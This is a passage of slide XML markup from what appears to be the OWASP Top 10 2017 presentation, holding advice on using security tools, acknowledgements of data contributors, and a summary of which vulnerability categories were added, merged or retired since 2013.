                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> is a guide for organizations and application reviewers on what to verify.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" baseline="0" dirty="0">
                        <a:latin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200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Use tools wisely</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. Security vulnerabilities can be quite complex and deeply buried in code. In many cases, the most cost-effective approach for finding and eliminating these weaknesses is human experts armed with advanced tools. Relying on tools alone provides a false sense of security and is not recommended.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Push left, right, and everywhere</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. Focus on making security an integral part of your culture throughout your development organization. Find out more in the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId14"/>
                        </a:rPr>
                        <a:t>OWASP Software Assurance Maturity Model (SAMM)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>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8" name="Table 1"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1757383712"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3429000" y="3810001"/>
          <a:ext cx="3429000" cy="5328377"/>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val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="334903">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Attribution</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4993097">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>We'd like to thank the organizations that contributed their vulnerability data to support the 2017 update. We received more than 40 responses to the call for data. For the first time, all the data contributed to a Top 10 release, and the full list of contributors is publicly available. We believe this is one of the larger, more diverse collections of vulnerability data ever publicly collected. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>As there are more contributors than space here, we have created a </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId15" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>dedicated page </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>to recognize the contributions made. We wish to give heartfelt thanks to these organizations for being willing to be on the front lines by publicly sharing vulnerability data from their efforts. We hope this will continue to grow and encourage more organizations to do the same and possibly be seen as one of the key milestones of evidence-based security. The OWASP Top 10 would not be possible without these amazing contributions. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A big thank you to the more than 500 individuals who took the time to complete the industry ranked survey. Your voice helped determine two new additions to the Top 10. The additional comments, notes of encouragement, and criticisms were all appreciated. We know your time is valuable and we wanted to say thanks.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>We would like to thank those individuals who have contributed significant constructive comments and time reviewing this update to the Top 10. As much as possible, we have listed them on the ‘</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId15" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Acknowledgements</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>’ page. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>And finally, we'd like to thank in advance all the translators out there who will translate this release of the Top 10 into numerous different languages, helping to make the OWASP Top 10 more accessible to the entire planet.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 Placeholder 10"/>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dirty="0"/>
              <a:t>I</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Title 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Introduction</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
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53BBC665-1B35-4A1D-B9C5-F23A146454B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1330608160"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990600"/>
          <a:ext cx="6858000" cy="8151509"/>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4800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>What changed from 2013 to 2017?</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16229">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Change has accelerated over the last four years, and the OWASP Top 10 needed to change. We've completely refactored the OWASP Top 10, revamped the methodology, utilized a new data call process, worked with the community, re-ordered our risks, re-written each risk from the ground up, and added references to frameworks and languages that are now commonly used. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:latin typeface="Liberation Sans"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Over the last few years, the fundamental technology and architecture of applications has changed significantly:</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:latin typeface="Liberation Sans"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" marR="0" lvl="0" indent="-82550" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Microservices written in node.js and Spring Boot are replacing traditional monolithic applications. Microservices come with their own security challenges including establishing trust between microservices, containers, secret management, etc. Old code never expected to be accessible from the Internet is now sitting behind an API or RESTful web service to be consumed by Single Page Applications (SPAs) and mobile applications. Architectural assumptions by the code, such as trusted callers, are no longer valid.</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0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Single page applications, written in JavaScript frameworks such as Angular and React, allow the creation of highly modular feature-rich front ends. Client-side functionality that has traditionally been delivered server-side brings its own security challenges.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" marR="0" lvl="0" indent="-82550" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>JavaScript is now the primary language of the web with node.js running server side and modern web frameworks such as Bootstrap, Electron, Angular, and React running on the client. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:latin typeface="Liberation Sans"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>New issues, supported by data:</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hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A4:2017-XML External Entities (XXE)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>is a new category primarily supported by </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>source code analysis security testing tools</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> (SAST)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> data sets. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:latin typeface="Liberation Sans"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>New issues, supported by the community:</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:latin typeface="Liberation Sans"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>We asked the community to provide insight into two forward looking weakness categories. After over 500 peer submissions, and removing issues that were already supported by data (such as Sensitive Data Exposure and XXE), the two new issues are: </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hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A8:2017-Insecure Deserialization</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, which permits remote code execution or sensitive object manipulation on affected platforms.</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hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A10:2017-Insufficient Logging and Monitoring</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, the lack of which can prevent or significantly delay malicious activity and breach detection, incident response, and digital forensics.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:latin typeface="Liberation Sans"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Merged or retired, but not forgotten:</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rPr>
                        <a:t>A4-Insecure Direct Object References </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A7-Missing Function Level Access Control </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>merged into </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A5:2017-Broken Access Control</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</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rPr>
                        <a:t>A8-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Cross-Site Request Forgery (CSRF)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> as many frameworks include </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>CSRF defenses</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, it was found in only 5% of applications.</a:t>
                      </a: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rPr>
